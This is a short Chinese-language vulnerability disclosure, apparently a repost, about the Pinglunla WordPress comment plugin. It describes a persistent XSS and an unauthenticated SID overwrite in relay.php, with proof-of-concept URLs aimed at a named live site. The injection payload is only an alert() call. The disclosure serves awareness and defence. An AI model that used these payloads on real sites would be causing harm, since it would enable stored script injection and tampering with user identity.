1.xss /wp-content/plugins/pinglunla/relay.php?sid=ec51555f3e5e125257457a73609bdbe15cb7c29d"></script><script>alert(0)</script><script%20src=" 以上URL 用于篡改评论啦的SID, 同时注入任意脚本, 脚本会被永久保存, 影响所有开启评论功能的页面. 漏洞 证明:http://www.alibuybuy.com/wp-content/plugins/pinglunla/relay.php?sid=ec51555f3e5e125257457a73609bdbe15cb7c29d"></script><script>alert(0)</script><script%20src=" 2. 通过一个精心构造的URL, 可以任意篡改储存在 数据库 的SID 值. SID 是评论啦用于识别用户身份的标识. 详细说明: www.2cto.com /wp-content/plugins/pinglunla/relay.php?sid=new sid here 以上URL是用来接收PINGLUNLA服务器的回调, 参数sid会被值"new sid here"替换保存至数据库, 因为没有做任何认证, 匿名用户可以任意调用该接口进而篡改sid. 漏洞证明: http://www.alibuybuy.com/wp-content/plugins/pinglunla/relay.php?sid=new sid here 修复方案: 除了等待官方修复, 或可临时修改你的文件夹名称, 如wp-content, plinglunla, 以免被猜解. 作者 markstip
查看更多关于评论啦Wordpress插件持久XSS及Key远程任意篡改 - 网的详细内容...